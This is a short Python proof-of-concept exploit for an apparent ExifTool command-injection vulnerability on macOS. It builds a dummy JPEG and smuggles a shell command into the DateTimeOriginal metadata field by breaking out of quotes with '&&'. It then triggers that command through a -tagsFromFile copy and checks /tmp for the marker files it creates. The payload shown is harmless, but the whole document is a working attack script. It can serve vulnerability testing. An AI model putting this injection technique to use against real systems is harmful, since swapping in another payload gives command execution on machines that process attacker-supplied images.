#!/usr/bin/env python3
import subprocess
import tempfile
import os
from datetime import datetime

def run_cmd(cmd):
    try:
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        return result.stdout + result.stderr
    except Exception as e:
        return str(e)

print("[+] ExifTool CVE-2026-3102 PoC (macOS)")

# Create dummy image
with open("poc_test.jpg", "wb") as f:
    f.write(b"\xFF\xD8\xFF\xE0" + b"\x00\x10JFIF" + b"\x00" * 100)

payload = f"touch /tmp/pwned_{int(datetime.now().timestamp())} && echo 'EXPLOITED at {datetime.now()}' >> /tmp/exiftool_poc.log"

print("[+] Writing malicious metadata...")
run_cmd(f'exiftool -n -DateTimeOriginal="2024:01:01 12:00:00\' && {payload} #" poc_test.jpg')

print("[+] Triggering vulnerability via -tagsFromFile...")
run_cmd(f'exiftool -n -tagsFromFile poc_test.jpg "-FileCreateDate<DateTimeOriginal" poc_test.jpg')

# Check
pwned_files = [f for f in os.listdir("/tmp") if f.startswith("pwned_")]
if pwned_files:
    print("✅ EXPLOIT SUCCESSFUL!")
    print("Pwned files:", pwned_files)
    with open("/tmp/exiftool_poc.log", "r") as f:
        print(f.read())
else:
    print("❌ Exploit did not trigger. Check version and platform.")

# Cleanup
for f in ["poc_test.jpg", "poc_test.jpg_original"]:
    if os.path.exists(f):
        os.remove(f)